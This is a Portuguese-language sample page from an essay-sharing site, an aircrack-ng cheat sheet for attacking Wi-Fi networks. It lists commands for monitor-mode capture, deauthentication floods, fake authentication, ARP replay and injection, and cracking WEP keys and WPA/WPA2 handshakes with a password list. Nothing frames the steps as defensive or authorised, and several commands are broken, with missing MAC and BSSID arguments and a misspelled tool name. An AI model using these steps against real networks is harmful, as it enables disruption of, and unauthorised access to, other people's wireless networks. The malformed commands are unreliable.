Aircrack

Disponível somente no TrabalhosFeitos
  • Páginas : 9 (2068 palavras )
  • Download(s) : 0
  • Publicado : 31 de julho de 2011
Ler documento completo
Amostra do texto
COMANDOS

> Para colocar em modo monitor:

- airmon-ng

> Para capturar pacotes:

- airodump-ng wlanx # Pega em todos os canais, e não salva em arquivo

- airodump-ng -w /root/nome_do_arquivo.pcap --output-format pcap --channel x wlanx # Pegando
em um canal específico e salvando o arquivo em /root. Este arquivo serve para quebrar a chave WEP ou WPA (2).

- airodump-ng --bssid -w/root/nome_do_arquivo.pcap --channel x wlanx # Para monitorar um
roteador específico.

- kismet # Este serve, entre outras coisas, para monitorar ataques pelo seus alertas. Seu arquivo de
configuração encontra-se em usr/etc/kismet.conf, comentar a linha da interface de rede"ncsource=wlanx".
Para executá-lo primeiro inicia o servidor e depois o cliente, para então poder capturarpacotes. Este
também serve para atualizar GPS, e utilizar a técnica de Wardriving.

> Para mostrar os pacotes que entram na interface:

- tcpdump -n -e -s0 -vvv -i wlanx # Mostra os pacotes que estão entrando na interface.

- tcpdump -n -e -s0 -vvv -i wlanx |DeAut # FIltra os pacotes de desautenticação.

> Ataques:

Desautenticação:

- aireplay-ng -0 0 -a -c wlanx # O número 0 é aquantidades de
pacotes que se deseja enviar, no caso o 0 é infito. O segundo mac é o mac do cliente que estava
associado, ou termina o comando sem o "-c" para ele fazer um broadcast.

Autenticação False

- aireplay-ng -1 0 -e teddy -a -h wlanx # teddy é o nome da rede.
Este só serve quando a criptografia é do tipo WEP.

Retransmissão interativa de pacotes

- aireplay-ng -2 -b-d FF:FF:FF:FF:FF:FF -t 1 wlanx # Serve para inundar as redes
de pacotes, para então conseguir mais informação para realizar os ataques. Espera pacotes de dados, para então
capturar um e forjar com outro igual. Para este ataque se faz necessário estar associado e autenticado ao AP, caso
contrário o roteador não irá aceitar os pacotes, para isso usa-se antes o ataque de AutenticaçãoFalse.

Retransmissão de Requisão ARP

- aireplay-ng -3 -b -d FF:FF:FF:FF:FF:FF -t 1 wlanx # Inunda com pacotes ARP, a variação “-e” quando quiser utilizar, ao invés do mac do Router, utilizar o ESSID da rede que se deseja fzer o ataque.

Ingeção

- aireplay-ng -9 wlanx # O número 9 é o tipo de ataque, no caso de ingeção, ele ajuda a decidir qual rede
vai atacar, pois com ele se descobrea quantidade pacotes capturados em %. Esse é o primeiro ataque para
descubrir se tem conectividade na rede.

- aireplay-ng -9 wlanx -e # Mesmo que o de acima, porém direciona o ataque a uma rede especifica.

> Pra Quebrar a Chave WEP

- aircrack-ng [options] # O options são comandos pra dizer
pro air pra dizer oque o aircrack quer fazer.

options: -e ; ...

> Extraçaõ deIV'Tools

- ivstools --convert arq.cap arq.ivs # Converte - Para filtrar somente os arquivos de vetorização e diminuir a
quantidade de pacotes para o aircrack demorar menos pra quebrar a chave, pois terá menos pacotes para analisar, o 2º
"arq.ivs" é o nome após o arquivo ser convertido.
Obs. Esse deve ser feito antes do próximo comando pois tem que convertê-lo antes.

- ivstools --mergearquivo1 arquivo2 arquivo3 # Serve pra quando não se consegue capturar pacote suficientes,
ela uni dois arquivos .cap e transforma em um arquivo só. Os dois primeiros arquivos "arquivo1" e "arquivo2" são os
arquivos capturados, e 3º é o nome dado ao arquivo a ser criado com a junção dos dois.

> Para Quebrar Chave WPA/WPA2 - Obs. Este é o modo mais fraco, pois ela não usa Banco de Dados.1º Passo: Captura handshakes de autenticação do AP (4)

2º Passo: Forçar desautenticação com o airplay.

- airplay-ng -0 1 -a -c wlan0

3º Passo:E então executar a quebra.

- aircrack-ng -w password.lst -b psk*.cap # O "password.lst" é a lista de senhas criadas, ou baixadas
pela net e "psk*.cap" é o arquivocapturado pelo airodump com os handshakes e o é o do AP a ser atacado...
tracking img